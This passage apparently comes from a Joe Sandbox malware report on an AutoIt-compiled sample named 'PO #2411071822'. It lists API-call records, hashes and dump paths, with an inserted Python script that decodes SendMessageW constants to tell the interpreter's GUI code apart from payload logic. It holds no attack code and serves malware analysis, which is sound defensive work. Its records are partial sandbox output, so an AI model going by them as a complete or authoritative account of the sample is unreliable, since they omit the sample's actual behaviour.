• String ID:
• API String ID: 2889604237-0
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 0041DEAA
Strings
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
APIs
Strings
Similarity
• API ID: _wcscpy
• String ID: I/E$I/E
• API String ID: 3048848545-1856474202
APIs
• Sleep.KERNEL32(00000000), ref: 003FBCDA
• GlobalMemoryStatusEx.KERNEL32 ref: 003FBCF3
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
                                                                                                              • Opcode ID: 5ed615ed1cf9babb75ccb4c5d9e3c4e225370a1d8a7201c9d351fd8637891eb6
                                                                                                              • Instruction ID: 6b718287d41df1d2218c108000cda39b650403c9ce5174e9c81b998ee3052dce
                                                                                                              • Opcode Fuzzy Hash: 5ed615ed1cf9babb75ccb4c5d9e3c4e225370a1d8a7201c9d351fd8637891eb6
                                                                                                              • Instruction Fuzzy Hash: 05513871408748DBE321AF14D885BAFBBE8FB95354F41485EF2C8460A2DF7089A88756
APIs
  • Part of subcall function 003E44ED: __fread_nolock.LIBCMT ref: 003E450B
• _wcscmp.LIBCMT ref: 0042C65D
• _wcscmp.LIBCMT ref: 0042C670
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: 2b598b730961f3a154cf6bc8c9567391eba23cf556b5cfab7a66c61e2eb1140f
• Instruction ID: ec3b0ab5cdf53cb8eaa4a536722e06bab4fd97a57e73a1e43a8c6f45eda12924
• Opcode Fuzzy Hash: 2b598b730961f3a154cf6bc8c9567391eba23cf556b5cfab7a66c61e2eb1140f
• Instruction Fuzzy Hash: F041E572B0026ABADF21ABA59C81FEF77B9EF49704F00006AF605FB1C1D6749A048B55
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0044A85A
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044A86F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: c52a322eddb14cc5f6a5c0f9eaa17ea33656ca4e082540a051242241f855beb5
• Instruction ID: 652122198642fb2cdd78bd4d2851cdec62e574d67a5a1e97e5438a2fc633aa97
• Opcode Fuzzy Hash: c52a322eddb14cc5f6a5c0f9eaa17ea33656ca4e082540a051242241f855beb5
• Instruction Fuzzy Hash: 39411875E403099FEB14DF68C881BDABBB9FB09304F14006AE905EB391D774A952CFA5
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 0044980E
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0044984A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: ce58b52b0e3662e6c9c01261531baad5ab57b254507cb9a6051e061c4b3d5a52
• Instruction ID: 925cf70faa05ac8a708aaf27f0b3f25cac29161f992f5c0d33a3a85593ce93af
• Opcode Fuzzy Hash: ce58b52b0e3662e6c9c01261531baad5ab57b254507cb9a6051e061c4b3d5a52
• Instruction Fuzzy Hash: B831CF31510204AEEB109F38CC81BFB73A9FF99320F00861AF9A9C7190CA34AC81D768
APIs
• _memset.LIBCMT ref: 004251C6
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00425201
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 8d34b7a04de841e4bdf2a863d3716994f039babc1dd10e51c07381c207f16e1f
• Instruction ID: 29a5d05baf9d3758d402cc5eb57b9687519cfd6d80f5906fb405c1356d8437e0
• Opcode Fuzzy Hash: 8d34b7a04de841e4bdf2a863d3716994f039babc1dd10e51c07381c207f16e1f
• Instruction Fuzzy Hash: D431F931B00324EBDB18CF99E8457AFBBF4AF45390F54005BE981A62E0D7789944CF29
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: __snwprintf
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 2391506597-2584243854
• Opcode ID: 2ba4eccfe41ba4ed149ce23983bfcde37dbb8996db53cdcaee26f6d7351a8efb
• Instruction ID: 9e498aa7bab7e102f99371b18bef3597acee0573d603e7a710c46ada3d5a965c
• Opcode Fuzzy Hash: 2ba4eccfe41ba4ed149ce23983bfcde37dbb8996db53cdcaee26f6d7351a8efb
• Instruction Fuzzy Hash: FF21D231600229BFCF11EF65C882FEE77B4AF49344F11416AF505AB181DB78EA45CBA9
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0044945C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00449467
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: af2a91fbbc63925d892f5fb80c139936c8dec7e95718d9e7253211afab02152e
• Instruction ID: 204827a8ce1232fabbeae3161450803e68c26520d090c5920b027a2e6b404687
• Opcode Fuzzy Hash: af2a91fbbc63925d892f5fb80c139936c8dec7e95718d9e7253211afab02152e
• Instruction Fuzzy Hash: 7F11B2713002086FFF219E54DC81EBB376EEB893A4F100126F918972A0D6799C529B68
APIs
  • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
• GetActiveWindow.USER32 ref: 0044DA7B
• EnumChildWindows.USER32(?,0044D75F,00000000), ref: 0044DAF5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Window$ActiveChildEnumLongWindows
• String ID: T1C
• API String ID: 3814560230-3179038950
• Opcode ID: d4d1e80dfb784a0fcd75678b4369e2a915662a822a62e062ae7dc51b84ee9d2b
• Instruction ID: 48231f9e57e73f7b6101ee7ca736873d8d744c9fce66718db5d68cb99b98e3a5
• Opcode Fuzzy Hash: d4d1e80dfb784a0fcd75678b4369e2a915662a822a62e062ae7dc51b84ee9d2b
• Instruction Fuzzy Hash: A6214F75A04605DFD714DF28D850AA6B7E5EF5A320F29062AF966C73E0D734A800CF68
APIs
  • Part of subcall function 003FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003FD1BA
  • Part of subcall function 003FD17C: GetStockObject.GDI32(00000011), ref: 003FD1CE
  • Part of subcall function 003FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003FD1D8
• GetWindowRect.USER32(00000000,?), ref: 00449968
• GetSysColor.USER32(00000012), ref: 00449982
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 2d8e9566ded717f4fe72b6098c2fd7c4ba47b2f8f9abd59ea6384ff0989263a4
• Instruction ID: 1b308625e75b1b4d152e3400382148c3dc2c48b7125283778ebf7dd0a8bbe680
• Opcode Fuzzy Hash: 2d8e9566ded717f4fe72b6098c2fd7c4ba47b2f8f9abd59ea6384ff0989263a4
• Instruction Fuzzy Hash: 9A112C7251020AAFDB04DFB8CC45AEB7BA8FB08354F014529F955D2250E774E851DB54
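The SendMessageW records on this page give the message argument only as a raw hex constant, so a reader has to look up each value by hand and then decide whether the call belongs to the AutoIt runtime's GUI code or to payload logic. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses the report's APIs/Similarity record lines, names the message values against a small table of Win32 constants (WM_SETFONT, EM_SETSEL, CB_ADDSTRING, CB_SETCURSEL, TVM_GETCOUNT, TVM_INSERTITEMW), and cross-checks the decoded message family against the window-class string the same function references. Agreeing pairs (CB_* beside "Combobox", EM_* beside "edit") corroborate that these functions are the interpreter's control helpers rather than FormBook behaviour. The input is a constructed excerpt copied from the treeview, combobox, static and edit records of this report; the constant table covers only the values seen here, and the set of class-name strings treated as a hint is an assumption.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: the APIs/Similarity lines of four function records copied
# from this report (the treeview, combobox, static and edit helpers).
RECORDS_TEXT = """\
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0044A85A
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044A86F
Similarity
• API ID: MessageSend
• String ID: '
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0044945C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00449467
Similarity
• API ID: MessageSend
• String ID: Combobox
APIs
  • Part of subcall function 003FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003FD1D8
• GetWindowRect.USER32(00000000,?), ref: 00449968
• GetSysColor.USER32(00000012), ref: 00449982
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 00449699
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004496A8
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
"""

# Win32 message values (winuser.h / commctrl.h) and the control family whose
# window procedure defines them; None marks a message any window understands.
MESSAGES = {
    0x0030: ("WM_SETFONT", None),
    0x00B1: ("EM_SETSEL", "edit"),
    0x0143: ("CB_ADDSTRING", "combobox"),
    0x014E: ("CB_SETCURSEL", "combobox"),
    0x1105: ("TVM_GETCOUNT", "treeview"),
    0x1132: ("TVM_INSERTITEMW", "treeview"),
}
# Assumed set of class-name strings worth treating as a control hint.
KNOWN_CLASSES = {"edit", "combobox", "listbox", "button", "static"}

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.Module(args), ref: address.  Calls without an argument list also occur.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID):\s*(?P<val>.*)$")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    parent: Optional[str] = None  # address of the subcall this line belongs to


@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""


def parse_records(text: str) -> List[Record]:
    """Split report text into records; each 'APIs' line opens a new one."""
    records: List[Record] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append(Record())
            continue
        if not records:
            continue
        m = API_LINE.match(line)
        if m:
            args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
            records[-1].calls.append(Call(m["api"], m["module"], args, m["ref"], m["parent"]))
            continue
        f = FIELD_LINE.match(line)
        if f and f["key"] == "API ID":
            records[-1].api_id = f["val"].strip()
        elif f:
            records[-1].string_id = f["val"].strip()
    return records


def message_of(call: Call) -> Optional[int]:
    """Numeric Msg argument of a SendMessage* call; None if absent or not constant ('?')."""
    if not call.api.startswith("SendMessage") or len(call.args) < 2 or call.args[1] == "?":
        return None
    return int(call.args[1], 16)


def decode_message(msg: int) -> str:
    """Symbolic name for a message value, or its hex form when not in the table."""
    return MESSAGES.get(msg, (f"0x{msg:04X}", None))[0]


def summarize(text: str) -> List[dict]:
    """Per record: decoded messages plus whether they agree with the class string."""
    out = []
    for rec in parse_records(text):
        msgs = [m for m in (message_of(c) for c in rec.calls) if m is not None]
        families = {MESSAGES[m][1] for m in msgs if m in MESSAGES and MESSAGES[m][1]}
        hint = rec.string_id.lower() if rec.string_id.lower() in KNOWN_CLASSES else None
        # True/False only when both a class hint and a control-specific message exist.
        consistent = None if hint is None or not families else hint in families
        out.append({"api_id": rec.api_id, "string_id": rec.string_id,
                    "messages": [decode_message(m) for m in msgs],
                    "class_consistent": consistent})
    return out


if __name__ == "__main__":
    for row in summarize(RECORDS_TEXT):
        print(row)
```

The treeview record carries no class string (its String ID is a lone quote), so the script reports its TVM_* messages without a verdict rather than flagging a mismatch; the static record's only message, WM_SETFONT, is generic and likewise yields no verdict. Extending MESSAGES is the only change needed to cover further records from the same report.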
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 00449699
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004496A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 282230db64f6ce448929b08578ff7f3d6344f69e84335c1baa0b84488aebc793
• Instruction ID: c8ccb0ccea96250d472512ad5167ffe6bc1840f5b4e3a6602df6507df0b1f5d6
                                                                                                              • Opcode Fuzzy Hash: 282230db64f6ce448929b08578ff7f3d6344f69e84335c1baa0b84488aebc793
                                                                                                              • Instruction Fuzzy Hash: 7511BC71500108ABFB205F64DC44EEB3B6AEB05378F114326F925972E0C779DC51AB68
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 004252D5
                                                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004252F4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                              • Opcode ID: 031a072ff8ed88a274411cfa0034fd581ba95054a2708b6a7e271f1cfcb1f8fd
                                                                                                              • Instruction ID: 057b86d2120842e12a1e8c56d01b4d611939c348328377a8ee8bd4e25699baee
                                                                                                              • Opcode Fuzzy Hash: 031a072ff8ed88a274411cfa0034fd581ba95054a2708b6a7e271f1cfcb1f8fd
                                                                                                              • Instruction Fuzzy Hash: E011D375B01634EBDB10DA98E904B9E77A8AB06790F440066ED01A72A0D3B8ED04CBA9
                                                                                                              APIs
                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00434DF5
                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00434E1E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Internet$OpenOption
                                                                                                              • String ID: <local>
                                                                                                              • API String ID: 942729171-4266983199
                                                                                                              • Opcode ID: 7b485763882c5ca0fea2d2e5e1befd40d8ac9527c4f001a7289587c6b2be92de
                                                                                                              • Instruction ID: 271a9bb46e5f2c6b7c5228fc3efc3a3421dedda148eeca8aa1d2e40f12aa0a5b
                                                                                                              • Opcode Fuzzy Hash: 7b485763882c5ca0fea2d2e5e1befd40d8ac9527c4f001a7289587c6b2be92de
                                                                                                              • Instruction Fuzzy Hash: E811E070600221BBDB248F51CC89EFBFBA8FF4A351F10822BF10546240E3786941C6F5
                                                                                                              APIs
                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004137A7
                                                                                                              • ___raise_securityfailure.LIBCMT ref: 0041388E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                              • String ID: (J
                                                                                                              • API String ID: 3761405300-3937933449
                                                                                                              • Opcode ID: 3033b04e866aa026bbe136cff1ec36b5dbb3e2365c39ade8d84123a54f536d3c
                                                                                                              • Instruction ID: 319fbe91620471445ddf67c7b8a544d86e55e522670e0b61ed27bb37f69872f1
                                                                                                              • Opcode Fuzzy Hash: 3033b04e866aa026bbe136cff1ec36b5dbb3e2365c39ade8d84123a54f536d3c
                                                                                                              • Instruction Fuzzy Hash: E821F3B5541304DAE700DF15E9956823FF5BB5E314F10983AE5088B3A0E3F5A980EF8E
                                                                                                              APIs
                                                                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0043A84E
                                                                                                              • htons.WSOCK32(00000000,?,00000000), ref: 0043A88B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: htonsinet_addr
                                                                                                              • String ID: 255.255.255.255
                                                                                                              • API String ID: 3832099526-2422070025
                                                                                                              • Opcode ID: 7437279f63e792195be49b434f5f2ab6ef4a96ff39ae62dfbc55b640e5cbe15f
                                                                                                              • Instruction ID: 17a5e2acfb375b5bf5843a1d8216c2fa74d4c5d10051a7932f4cacc830fdf24f
                                                                                                              • Opcode Fuzzy Hash: 7437279f63e792195be49b434f5f2ab6ef4a96ff39ae62dfbc55b640e5cbe15f
                                                                                                              • Instruction Fuzzy Hash: FA012674640304ABCB14EF68C886FADB364EF08314F10952BF5129B3D1D779E812C75A
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0041B7EF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: ComboBox$ListBox
                                                                                                              • API String ID: 3850602802-1403004172
                                                                                                              • Opcode ID: 08254b50157c697d7d8957ff948413fd1371d454998ec1916a3a3462dafaca4b
                                                                                                              • Instruction ID: 2ef0dbcd8661f9e4ae77cc276645af99a239559f57cc0d4e4c23a2e0e9a3c3cd
                                                                                                              • Opcode Fuzzy Hash: 08254b50157c697d7d8957ff948413fd1371d454998ec1916a3a3462dafaca4b
                                                                                                              • Instruction Fuzzy Hash: 5F012871A10124BBCB05EBA4CC429FE7369FF45310710061EF471572C1EBB85909C7A8
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0041B6EB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID: ComboBox$ListBox
                                                                                                              • API String ID: 3850602802-1403004172
                                                                                                              • Opcode ID: 78e522ac752cca8df746adc37553b229f7bdc0f5db7a1fa017bc189b958afabd
                                                                                                              • Instruction ID: ca8ce07c2b0655692ab4fb88f679a5eb3c183e96fa7e6b3fa4190f4b17eaf0f6
                                                                                                              • Opcode Fuzzy Hash: 78e522ac752cca8df746adc37553b229f7bdc0f5db7a1fa017bc189b958afabd
                                                                                                              • Instruction Fuzzy Hash: AC018FB1A41014BBCB05EBA5CA52BFF73A99F15344F10002EF402A72C1EB985E1987EE
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 0041B76C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
